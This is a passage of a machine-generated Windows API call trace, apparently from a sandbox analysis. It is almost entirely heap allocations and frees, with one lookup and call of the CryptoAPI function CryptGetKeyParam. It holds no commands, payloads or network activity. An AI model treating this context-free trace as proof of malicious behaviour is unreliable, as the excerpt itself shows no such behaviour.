lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0091.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0091.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0091.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0091.624] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0091.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a10 [0091.624] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0091.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0091.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca778 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0091.624] PeekMessageW (in: lpMsg=0x144dfec, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144dfec) returned 0 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0091.624] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0091.625] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0091.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0091.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0091.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0091.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0091.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.626] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0091.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.627] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0091.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0091.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0091.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0091.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.628] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0091.628] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0091.629] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0091.629] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0091.630] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0091.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0091.630] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e48 [0091.631] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0091.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0091.631] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0091.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0091.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0091.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0091.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0091.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0091.631] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0091.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0091.632] CryptGetKeyParam (in: hKey=0x41ac2c0, dwParam=0x7, pbData=0x43e25a0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e25a0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9a40 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0091.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0091.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0091.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0091.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0091.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0091.632] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0091.632] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0091.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0091.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0091.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0091.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0091.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ea8 [0091.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2bd8 [0091.633] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0091.633] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0091.634] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 